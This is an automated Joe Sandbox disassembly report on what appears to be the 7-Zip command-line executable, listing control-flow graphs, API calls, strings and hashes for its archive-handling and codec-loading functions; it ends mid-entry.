                                                                                                                                                                • String ID: Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Scanning the drive for archives:$Size: $Warnings:
                                                                                                                                                                • API String ID: 2822829076-727241755
                                                                                                                                                                • Opcode ID: 52eca1c720360a96b5f1cad79a777f51e0d7cf5cf657028d3eac016911b17338
                                                                                                                                                                • Instruction ID: b5dc60ab1e945246537cffa52dee83b7193ac9ef5c0d067f1eee9c1affdafbc7
                                                                                                                                                                • Opcode Fuzzy Hash: 52eca1c720360a96b5f1cad79a777f51e0d7cf5cf657028d3eac016911b17338
                                                                                                                                                                • Instruction Fuzzy Hash: 1422137620AAC1E1CA74EB25E8943EEA3B0F785B80F444126DA9E47B1ADF3CC556C711

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 2649 7ba180-7ba1e9 GetProcAddress * 2 2650 7ba1eb-7ba1fe GetProcAddress 2649->2650 2651 7ba214-7ba22a GetProcAddress 2649->2651 2652 7ba233-7ba23e 2650->2652 2653 7ba200-7ba20d 2650->2653 2651->2652 2654 7ba22c-7ba22e 2651->2654 2656 7ba729 2652->2656 2657 7ba244-7ba2f0 call 793208 call 7b8928 2652->2657 2653->2652 2660 7ba20f 2653->2660 2655 7ba72b-7ba73e 2654->2655 2656->2655 2664 7ba648 2657->2664 2665 7ba2f6-7ba30a 2657->2665 2660->2655 2668 7ba718-7ba727 call 7b94a8 2664->2668 2666 7ba31c-7ba321 2665->2666 2667 7ba30c-7ba31a 2665->2667 2671 7ba328-7ba32b 2666->2671 2667->2671 2668->2655 2673 7ba34a-7ba350 2671->2673 2674 7ba32d-7ba345 call 79ae2c call 7b94a8 2671->2674 2676 7ba36f-7ba37d SysStringByteLen 2673->2676 2677 7ba352-7ba36a call 79ae2c call 7b94a8 2673->2677 2692 7ba634-7ba63d 2674->2692 2678 7ba64d-7ba65d call 79ae2c 2676->2678 2679 7ba383-7ba3e3 call 79ae2c * 2 call 793208 * 2 call 7b8928 2676->2679 2677->2692 2678->2668 2701 7ba3e9-7ba40c call 7b8928 2679->2701 2702 7ba662-7ba678 free * 2 2679->2702 2692->2657 2694 7ba643 2692->2694 2694->2656 2705 7ba67d-7ba693 free * 2 2701->2705 2706 7ba412-7ba424 call 7b9d98 2701->2706 2702->2668 2705->2668 2708 7ba429-7ba485 call 7b87a8 call 7b8860 2706->2708 2713 7ba48b-7ba49c 2708->2713 2714 7ba698-7ba6ae free * 2 2708->2714 2715 7ba4ee-7ba51b call 7b9380 2713->2715 2716 7ba49e-7ba4a5 2713->2716 2714->2668 2721 7ba521-7ba526 2715->2721 2722 7ba6b0-7ba6d1 free * 3 2715->2722 2717 7ba4ab-7ba4d9 call 7b87a8 2716->2717 2726 7ba4db-7ba4de 2717->2726 2727 7ba4e5-7ba4ec 2717->2727 2724 7ba528-7ba53f call 7b98d4 2721->2724 2725 7ba541-7ba564 call 7b9380 2721->2725 2722->2668 2732 7ba583-7ba5b7 call 7b8860 2724->2732 2733 7ba56a-7ba57e call 7ba034 2725->2733 2734 7ba6d3-7ba6f4 free * 3 2725->2734 2726->2727 2727->2715 2727->2717 2738 7ba5bd-7ba5c0 2732->2738 2739 7ba6f6-7ba715 free * 3 2732->2739 2733->2732 2734->2668 2740 7ba5cf-7ba5e4 call 792130 2738->2740 2741 7ba5c2-7ba5ca 2738->2741 2739->2668 2744 7ba5f8 2740->2744 2745 7ba5e6-7ba5f6 call 7b9af0 2740->2745 2741->2740 2747 7ba5fb-7ba62f call 79b8f0 free * 3 call 7b94a8 2744->2747 2745->2747 2747->2692
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc
                                                                                                                                                                • String ID: GetHandlerProperty$GetHandlerProperty2$GetIsArc$GetNumberOfFormats
                                                                                                                                                                • API String ID: 190572456-3984264347
                                                                                                                                                                • Opcode ID: 753b0d9ca988719fe0be5fc4b9a7bc1a98751f9b1b540d81fe976a9fa7aa9b16
                                                                                                                                                                • Instruction ID: 368bccfb70edfcbc4b9fc0d9dfe56d48c33ee9e6dc73cff4cee6e6a85f1cc8f9
                                                                                                                                                                • Opcode Fuzzy Hash: 753b0d9ca988719fe0be5fc4b9a7bc1a98751f9b1b540d81fe976a9fa7aa9b16
                                                                                                                                                                • Instruction Fuzzy Hash: 70D14F72259AC0E6CA20EB25F8447DEA3A4F7C6B80F441525EB8E87B19DF7CD546CB01

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 2752 7970c8-7970e4 call 797d4c 2754 7970e9-7970ec 2752->2754 2755 7970f9-797103 call 799d84 2754->2755 2756 7970ee-7970f0 2754->2756 2761 79710c-797136 call 799ed8 call 793274 call 79376c 2755->2761 2762 797105-797107 2755->2762 2756->2755 2757 7970f2-7970f4 2756->2757 2759 797449-797458 2757->2759 2769 797138-797141 2761->2769 2770 79715b-797175 call 793314 2761->2770 2762->2759 2769->2770 2771 797143-797145 2769->2771 2777 79717a-797186 call 79a170 2770->2777 2773 79714c-797155 2771->2773 2774 797147 2771->2774 2773->2770 2776 7973f1-7973fe free 2774->2776 2776->2759 2780 797188-797195 CreateDirectoryW 2777->2780 2781 7971aa-7971ac 2777->2781 2782 79719b-7971a4 GetLastError 2780->2782 2783 797360-797364 2780->2783 2784 79727d-797286 GetLastError 2781->2784 2785 7971b2-7971d2 call 793208 call 79a7ec 2781->2785 2782->2781 2782->2784 2788 7973c9-7973e1 free * 2 2783->2788 2789 797366-797379 call 799ab0 2783->2789 2786 797288-7972b5 call 797d28 call 793208 call 797ebc 2784->2786 2787 7972e4-7972ed GetLastError 2784->2787 2805 7971d8-7971e7 CreateDirectoryW 2785->2805 2806 797273-797278 free 2785->2806 2827 7972b7-7972c4 free 2786->2827 2828 7972c6-7972db free 2786->2828 2793 7973e3-7973ee free 2787->2793 2794 7972f3-797301 call 79376c 2787->2794 2788->2759 2802 79737b-79737f 2789->2802 2803 797381 2789->2803 2793->2776 2809 797432-797447 free * 2 2794->2809 2810 797307-797309 2794->2810 2808 797385-7973a3 call 793460 call 796c84 2802->2808 2803->2808 2811 7971ed-7971f6 GetLastError 2805->2811 2812 797356-79735b free 2805->2812 2806->2784 2834 7973ad-7973c4 free * 2 2808->2834 2835 7973a5-7973a9 2808->2835 2809->2759 2810->2809 2815 79730f-797316 2810->2815 2818 7971f8-797202 free 2811->2818 2819 797207-797230 call 797d28 call 793208 call 797ebc 2811->2819 2812->2783 2816 797318-79731c 2815->2816 2817 79732c-797332 2815->2817 2822 797400-797417 free * 2 2816->2822 2823 797322-797326 2816->2823 2824 797419-797430 free * 2 2817->2824 2825 797338-79733c 2817->2825 2818->2787 2841 79724f-797271 free * 2 2819->2841 2842 797232-79724a free * 2 2819->2842 2822->2759 2823->2817 2823->2822 2824->2759 2825->2777 2831 797342-797351 2825->2831 2827->2787 2833 7972e0-7972e2 2828->2833 2831->2777 2833->2783 2833->2787 2834->2759 2835->2789 2837 7973ab 2835->2837 2837->2788 2841->2833 2842->2787
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00797D4C: GetFileAttributesW.KERNELBASE ref: 00797D6E
                                                                                                                                                                  • Part of subcall function 00797D4C: GetFileAttributesW.KERNEL32 ref: 00797DA5
                                                                                                                                                                  • Part of subcall function 00797D4C: free.MSVCRT ref: 00797DB2
                                                                                                                                                                • free.MSVCRT ref: 007973F6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AttributesFilefree
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1936811914-0
                                                                                                                                                                • Opcode ID: 2b197326d930c81739ce0310d85795b3f658fd51b37e5abb9d2da20ad921631d
                                                                                                                                                                • Instruction ID: b5df9c42ebbd90fa4862aae1c922f76f3df295c1235d118d32f3bfe00cc2ed0e
                                                                                                                                                                • Opcode Fuzzy Hash: 2b197326d930c81739ce0310d85795b3f658fd51b37e5abb9d2da20ad921631d
                                                                                                                                                                • Instruction Fuzzy Hash: 0E818F2227C585D2CE24EF26F85566EA331FBC5784F445122FB8E8766ADE2CD906DB00

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 3059 79f71c-79f74e call 791610 3062 79f750-79f773 call 7b02a0 _CxxThrowException 3059->3062 3063 79f774-79f7c2 _isatty * 3 3059->3063 3062->3063 3065 79f7d4 3063->3065 3066 79f7c4-79f7c8 3063->3066 3069 79f7d9-79f81c 3065->3069 3066->3065 3068 79f7ca-79f7ce 3066->3068 3068->3065 3070 79f7d0-79f7d2 3068->3070 3071 79f82a 3069->3071 3072 79f81e-79f822 3069->3072 3070->3069 3073 79f830-79f834 3071->3073 3072->3071 3074 79f824-79f828 3072->3074 3075 79f83c-79f846 3073->3075 3076 79f836 3073->3076 3074->3071 3074->3073 3077 79f848-79f84e 3075->3077 3078 79f854-79f85e 3075->3078 3076->3075 3077->3078 3079 79f86c-79f876 3078->3079 3080 79f860-79f866 3078->3080 3081 79f878-79f87e 3079->3081 3082 79f884-79f88e 3079->3082 3080->3079 3081->3082 3083 79f890-79f89d 3082->3083 3084 79f8f3-79f8fd 3082->3084 3087 79f8ab-79f8be call 79ed34 3083->3087 3088 79f89f-79f8a9 3083->3088 3085 79f91a-79f931 call 79ac74 * 2 3084->3085 3086 79f8ff-79f917 3084->3086 3096 79f936-79f940 3085->3096 3086->3085 3094 79f8c0-79f8e5 call 7b02a0 _CxxThrowException 3087->3094 3095 79f8e6-79f8ed 3087->3095 3088->3084 3094->3095 3095->3084 3099 79f9dd-79f9e7 3096->3099 3100 79f946-79f95c 3096->3100 3103 79f9ed-79f9fa 3099->3103 3104 79fa94-79fa9c 3099->3104 3101 79f95e-79f963 3100->3101 3102 79f965-79f977 wcscmp 3100->3102 3105 79f9bb-79f9c2 call 79ad0c 3101->3105 3102->3105 3106 79f979-79f98c call 79ed34 3102->3106 3103->3104 3107 79fa00-79fa1c call 792bc8 call 792d34 3103->3107 3105->3099 3115 79f9c4-79f9d7 call 7dd4c0 call 79ac74 3105->3115 3116 79f98e-79f9b3 call 7b02a0 _CxxThrowException 3106->3116 3117 79f9b4 3106->3117 3122 79fa4f-79fa74 call 7b02a0 _CxxThrowException 3107->3122 3123 79fa1e-79fa3b call 793f78 3107->3123 3115->3099 3116->3117 3117->3105 3133 79fa75-79fa8f GetCurrentProcess SetProcessAffinityMask free 3122->3133 3131 79fa49-79fa4d 3123->3131 3132 79fa3d-79fa46 3123->3132 3131->3122 3131->3133 3132->3131 3133->3104
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                • Unsupported switch postfix -stm, xrefs: 0079FA52
                                                                                                                                                                • SeRestorePrivilege, xrefs: 0079F91C
                                                                                                                                                                • SeCreateSymbolicLinkPrivilege, xrefs: 0079F92A
                                                                                                                                                                • SeLockMemoryPrivilege, xrefs: 0079F9CB
                                                                                                                                                                • Unsupported switch postfix -bb, xrefs: 0079F8C3
                                                                                                                                                                • Unsupported switch postfix for -slp, xrefs: 0079F991
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExceptionThrowfree$_isatty$Process$AffinityCurrentMaskwcscmp
                                                                                                                                                                • String ID: SeCreateSymbolicLinkPrivilege$SeLockMemoryPrivilege$SeRestorePrivilege$Unsupported switch postfix -bb$Unsupported switch postfix -stm$Unsupported switch postfix for -slp
                                                                                                                                                                • API String ID: 1961088698-2328792591
                                                                                                                                                                • Opcode ID: c2f4b7cbffa4da8aa62650c82c274732c1406b7f11731e234dbbf7887eb3a42e
                                                                                                                                                                • Instruction ID: a54bb8981dce2715602572236b5a5a66bab13889a55d0d0614f0160c39b99a67
                                                                                                                                                                • Opcode Fuzzy Hash: c2f4b7cbffa4da8aa62650c82c274732c1406b7f11731e234dbbf7887eb3a42e
                                                                                                                                                                • Instruction Fuzzy Hash: BDA18D73A08AC5DADF11DF25E4943AC3B20E786B94F988076DB8D87725CB6CD995C700

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 3134 7da448-7da455 3135 7da49c-7da4a4 3134->3135 3136 7da457-7da45f 3134->3136 3137 7da4f4 3135->3137 3138 7da4a6-7da4a9 3135->3138 3136->3135 3139 7da461-7da495 call 792300 fputs call 7926a0 call 792300 3136->3139 3142 7da4fc-7da50a 3137->3142 3140 7da4df-7da4e5 3138->3140 3141 7da4ab-7da4da call 792300 fputs call 7926a0 call 792300 3138->3141 3139->3135 3140->3142 3141->3140 3145 7da53d-7da559 free 3142->3145 3146 7da50c 3142->3146 3148 7da58c-7da5b5 free 3145->3148 3149 7da55b 3145->3149 3151 7da510-7da526 3146->3151 3161 7da5c5-7da5c8 3148->3161 3162 7da5b7-7da5be 3148->3162 3153 7da55f-7da575 3149->3153 3156 7da538-7da53b 3151->3156 3157 7da528-7da533 free * 2 3151->3157 3159 7da587-7da58a 3153->3159 3160 7da577-7da582 free * 2 3153->3160 3156->3145 3156->3151 3157->3156 3159->3148 3159->3153 3160->3159 3167 7da5ca-7da5e6 _CxxThrowException 3161->3167 3168 7da5e7-7da603 free 3161->3168 3162->3161 3165 7da5c0 3162->3165 3170 7da5c0 call 7d66a8 3165->3170 3167->3168 3171 7da605 3168->3171 3172 7da626-7da637 free call 7ba13c 3168->3172 3170->3161 3173 7da609-7da624 free 3171->3173 3175 7da63c-7da675 call 7d7080 call 79182c call 7d7f50 3172->3175 3173->3172 3173->3173 3182 7da6a8-7da6c9 free 3175->3182 3183 7da677 3175->3183 3184 7da67b-7da691 3183->3184 3186 7da6a3-7da6a6 3184->3186 3187 7da693-7da69e free * 2 3184->3187 3186->3182 3186->3184 3187->3186
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: free$fputs$ExceptionThrowfputc
                                                                                                                                                                • String ID: Errors: $Warnings:
                                                                                                                                                                • API String ID: 437615013-2345102087
                                                                                                                                                                • Opcode ID: c75879e89a0d6b0eb1bb642928b78a50b68f1ecf96ffdd04da6d3d4d6d5326dc
                                                                                                                                                                • Instruction ID: d3356993399a711933b7f321a4d4ad49024e7957af2deaad79d8bbcf069c8fc8
                                                                                                                                                                • Opcode Fuzzy Hash: c75879e89a0d6b0eb1bb642928b78a50b68f1ecf96ffdd04da6d3d4d6d5326dc
                                                                                                                                                                • Instruction Fuzzy Hash: 8651A1227595C5E1CD30BB29F9847ADA371F781B90F484123DA9E17B5ACF3CC8968702

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 3188 7b83c8-7b841d call 796570 call 7931c0 call 798624 3195 7b841f-7b844c call 7931c0 call 7986dc 3188->3195 3196 7b8482 3188->3196 3195->3196 3210 7b844e-7b847b call 7931c0 call 7986dc 3195->3210 3198 7b8485-7b8489 3196->3198 3199 7b848b-7b8498 free 3198->3199 3200 7b8499-7b849d 3198->3200 3199->3200 3202 7b849f-7b84ac free 3200->3202 3203 7b84ad-7b84b1 3200->3203 3202->3203 3205 7b84bd-7b84c0 3203->3205 3206 7b84b3-7b84b8 free 3203->3206 3208 7b85ef-7b8607 call 793314 free 3205->3208 3209 7b84c6-7b84ee call 793208 call 7b8290 3205->3209 3206->3205 3217 7b860a-7b8611 3208->3217 3222 7b851b-7b8538 call 7b8290 3209->3222 3223 7b84f0-7b8516 call 793314 free * 2 3209->3223 3210->3196 3224 7b847d-7b8480 3210->3224 3229 7b853a-7b8560 call 793314 free * 2 3222->3229 3230 7b8565-7b857b call 7b8290 3222->3230 3223->3217 3224->3198 3229->3217 3235 7b857d-7b85a3 call 793314 free * 2 3230->3235 3236 7b85a5-7b85bb call 7b8290 3230->3236 3235->3217 3241 7b85bd-7b85e3 call 793314 free * 2 3236->3241 3242 7b85e5-7b85ea free 3236->3242 3241->3217 3242->3208
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                • String ID: 7z.dll$Codecs$Formats$Path$Path64
                                                                                                                                                                • API String ID: 1534225298-3804457719
                                                                                                                                                                • Opcode ID: 83274c2b3d544992283108eb9c5b7aa940d95cecb85798d2266b0b7fa0fa9ebc
                                                                                                                                                                • Instruction ID: 896b1a13a3235402a9f43f830cdbd9874e3ea6068ca8af8dc3adc48e049e7d34
                                                                                                                                                                • Opcode Fuzzy Hash: 83274c2b3d544992283108eb9c5b7aa940d95cecb85798d2266b0b7fa0fa9ebc
                                                                                                                                                                • Instruction Fuzzy Hash: 7051B222249A49D0CE60EF15F8557EA6720EBC67E4F441162BA5E477BACF2CC68BC701

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 3245 7bab74-7baba4 3246 7babd3-7babf5 3245->3246 3247 7baba6 3245->3247 3248 7babfb 3246->3248 3249 7bae31-7bae78 call 7b83c8 call 7931c0 call 7ba7fc free 3246->3249 3250 7babaa-7babbc 3247->3250 3251 7bac02-7bacba call 793208 call 793518 call 793208 * 2 3248->3251 3268 7bae7a 3249->3268 3269 7bae7f-7bae87 3249->3269 3253 7babce-7babd1 3250->3253 3254 7babbe-7babc9 call 7b94a8 free 3250->3254 3278 7bacbc-7bacc1 call 793518 3251->3278 3279 7bacc6-7baccd 3251->3279 3253->3246 3253->3250 3254->3253 3271 7baf7a-7baf99 free 3268->3271 3272 7bae99-7baeca call 7931c0 call 7ba9fc free 3269->3272 3273 7bae89-7bae94 call 79339c 3269->3273 3288 7baecc 3272->3288 3289 7baed1-7baeee call 7931c0 call 7ba9fc 3272->3289 3273->3272 3278->3279 3282 7bacd9-7bad35 call 7b9d98 free * 2 3279->3282 3283 7baccf-7bacd4 call 793518 3279->3283 3290 7bad51-7bad61 call 792130 3282->3290 3291 7bad37-7bad4c call 7ba034 3282->3291 3283->3282 3288->3271 3302 7baef3-7baf02 free 3289->3302 3300 7bad6c 3290->3300 3301 7bad63-7bad6a 3290->3301 3299 7baddd-7badf2 call 792130 3291->3299 3311 7bae03 3299->3311 3312 7badf4-7bae01 call 7b9af0 3299->3312 3304 7bad6f-7bad8b call 79b8f0 3300->3304 3301->3304 3305 7baf06-7baf10 3302->3305 3306 7baf04 3302->3306 3321 7badbd-7badc0 3304->3321 3322 7bad8d-7bad93 3304->3322 3309 7baf18-7baf1b 3305->3309 3310 7baf12-7baf16 3305->3310 3306->3271 3314 7baf2a-7baf2e 3309->3314 3315 7baf1d-7baf24 3309->3315 3310->3314 3316 7bae06-7bae2b call 79b8f0 call 7b94a8 3311->3316 3312->3316 3318 7baf30-7baf36 3314->3318 3319 7baf77 3314->3319 3315->3314 3317 7baf26 3315->3317 3316->3249 3316->3251 3317->3314 3318->3319 3326 7baf38 3318->3326 3319->3271 3327 7badda 3321->3327 3328 7badc2-7badd3 memmove 3321->3328 3323 7bada1-7badac 3322->3323 3324 7bad95-7bad9a free 3322->3324 3330 7badae-7badb9 call 792130 3323->3330 3331 7badd5-7badd8 3323->3331 3324->3323 3333 7baf3b-7baf5a GetProcAddress 3326->3333 3327->3299 3328->3299 3330->3321 3331->3299 3336 7baf5c-7baf64 3333->3336 3337 7baf66-7baf6f 3333->3337 3336->3337 3342 7baf73-7baf75 3336->3342 3337->3333 3340 7baf71 3337->3340 3340->3319 3342->3271
                                                                                                                                                                APIs
                                                                                                                                                                • free.MSVCRT ref: 007BABC9
                                                                                                                                                                • free.MSVCRT ref: 007BACF3
                                                                                                                                                                • free.MSVCRT ref: 007BACFE
                                                                                                                                                                • free.MSVCRT ref: 007BAD95
                                                                                                                                                                • memmove.MSVCRT(?), ref: 007BADCB
                                                                                                                                                                • free.MSVCRT ref: 007BAE70
                                                                                                                                                                • free.MSVCRT ref: 007BAF7F
                                                                                                                                                                  • Part of subcall function 007B94A8: free.MSVCRT ref: 007B94DB
                                                                                                                                                                  • Part of subcall function 007B94A8: free.MSVCRT ref: 007B94E3
                                                                                                                                                                  • Part of subcall function 007B94A8: free.MSVCRT ref: 007B94F0
                                                                                                                                                                  • Part of subcall function 007B94A8: free.MSVCRT ref: 007B951C
                                                                                                                                                                  • Part of subcall function 007B94A8: free.MSVCRT ref: 007B9525
                                                                                                                                                                  • Part of subcall function 007B94A8: free.MSVCRT ref: 007B952D
                                                                                                                                                                  • Part of subcall function 007B94A8: free.MSVCRT ref: 007B953A
                                                                                                                                                                • free.MSVCRT ref: 007BAEC2
                                                                                                                                                                  • Part of subcall function 0079339C: free.MSVCRT ref: 007933D7
                                                                                                                                                                  • Part of subcall function 0079339C: memmove.MSVCRT(00000000,?,?,00000000,007910A8), ref: 007933F2
                                                                                                                                                                  • Part of subcall function 007BA9FC: free.MSVCRT ref: 007BAA95
                                                                                                                                                                  • Part of subcall function 007BA9FC: free.MSVCRT ref: 007BAAC5
                                                                                                                                                                  • Part of subcall function 007BA9FC: free.MSVCRT ref: 007BAAD2
                                                                                                                                                                • free.MSVCRT ref: 007BAEFA
                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 007BAF4D
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: free$memmove$AddressProc
                                                                                                                                                                • String ID: 7z.dll$Codecs\$Formats\$SetCodecs
                                                                                                                                                                • API String ID: 4053071709-2499791885
                                                                                                                                                                • Opcode ID: 394ff9574b194f86db9864d8b40a296a6876edca15e7f5d7566c190e77a9aee2
                                                                                                                                                                • Instruction ID: 31c92c5b00a216126fab46d43432d973d1690056a6e5bf2a959f60648e5d1d73
                                                                                                                                                                • Opcode Fuzzy Hash: 394ff9574b194f86db9864d8b40a296a6876edca15e7f5d7566c190e77a9aee2
                                                                                                                                                                • Instruction Fuzzy Hash: DDB18E66209AC5E6CA20FB25F5813AFB760F385788F504112EB8E47B29DF7CD969C701

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 3343 7d1850-7d1886 EnterCriticalSection 3344 7d1888-7d188e call 7db1c8 3343->3344 3345 7d18b1-7d18bb 3343->3345 3349 7d1893-7d18ac 3344->3349 3347 7d18bd call 7922e4 3345->3347 3348 7d18c2-7d18c4 3345->3348 3347->3348 3351 7d18ca-7d18d2 3348->3351 3352 7d1991-7d199e 3348->3352 3349->3345 3355 7d191a-7d192b 3351->3355 3356 7d18d4-7d18da 3351->3356 3353 7d1a4e-7d1a57 LeaveCriticalSection 3352->3353 3354 7d19a4-7d19a7 3352->3354 3357 7d1a59-7d1a62 3353->3357 3354->3353 3358 7d19ad-7d19b7 3354->3358 3359 7d192d-7d193a call 792300 3355->3359 3360 7d196a-7d1974 3355->3360 3356->3355 3361 7d18dc-7d18e2 3356->3361 3362 7d19b9-7d19d7 call 792300 fputs 3358->3362 3363 7d1a31-7d1a4c LeaveCriticalSection 3358->3363 3359->3360 3375 7d193c-7d1965 fputs call 7926a0 call 792300 3359->3375 3360->3363 3365 7d197a-7d1981 3360->3365 3366 7d18ed 3361->3366 3367 7d18e4-7d18eb 3361->3367 3378 7d19d9-7d19f0 fputs 3362->3378 3379 7d19f2-7d1a14 call 796618 call 792320 free 3362->3379 3363->3357 3365->3363 3371 7d1987-7d198c call 7922e4 3365->3371 3368 7d18f4-7d18fe 3366->3368 3367->3368 3368->3360 3373 7d1900-7d1913 fputs call 792300 3368->3373 3371->3363 3381 7d1918 3373->3381 3375->3360 3382 7d1a19-7d1a2c call 792300 call 7922e4 3378->3382 3379->3382 3381->3360 3382->3363
                                                                                                                                                                APIs
                                                                                                                                                                • EnterCriticalSection.KERNEL32 ref: 007D1877
                                                                                                                                                                • fputs.MSVCRT ref: 007D190A
                                                                                                                                                                • LeaveCriticalSection.KERNEL32 ref: 007D1A44
                                                                                                                                                                  • Part of subcall function 007DB1C8: memset.MSVCRT ref: 007DB20D
                                                                                                                                                                  • Part of subcall function 007DB1C8: fputs.MSVCRT ref: 007DB232
                                                                                                                                                                • fputs.MSVCRT ref: 007D194D
                                                                                                                                                                  • Part of subcall function 007926A0: fputs.MSVCRT ref: 007926C1
                                                                                                                                                                • fputs.MSVCRT ref: 007D19CB
                                                                                                                                                                • fputs.MSVCRT ref: 007D19EA
                                                                                                                                                                • LeaveCriticalSection.KERNEL32 ref: 007D1A51
                                                                                                                                                                  • Part of subcall function 00792300: fputc.MSVCRT ref: 00792311
                                                                                                                                                                • free.MSVCRT ref: 007D1A14
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
